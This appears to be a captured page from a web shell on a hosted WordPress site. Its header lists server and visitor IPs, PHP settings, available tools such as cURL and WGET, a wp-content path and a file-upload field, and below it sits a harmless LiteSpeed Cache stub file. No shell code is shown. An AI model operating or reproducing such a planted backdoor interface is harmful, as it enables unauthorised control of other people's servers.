| Server IP : 217.160.0.154 / Your IP : 216.73.217.145 Web Server : Apache System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux User : u97626428 ( 1555483) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /homepages/13/d787277790/htdocs/clickandbuilds/URP/wp-content/ |
Upload File : |
<?php
/**
* LiteSpeed Cache Plugin
*/
if (!defined('ABSPATH')) {
die();
}
define('LSCACHE_ADV_CACHE', true);
/**
* Because of the way it handles caching, the LiteSpeed Cache plugin for WordPress does not need an advanced-cache.php file.
* For this reason, there is no real logic in this file. So why include it at all?
* Setting the WP_CACHE global variable requires that an advanced-cache.php file exists.
* This variable can help to increase compatibility as other plugins can check it to determine whether or not a cache is currently being used.
* It can also help to avoid conflicts with other full page caches such as W3 Total Cache, etc.
*
*/
return;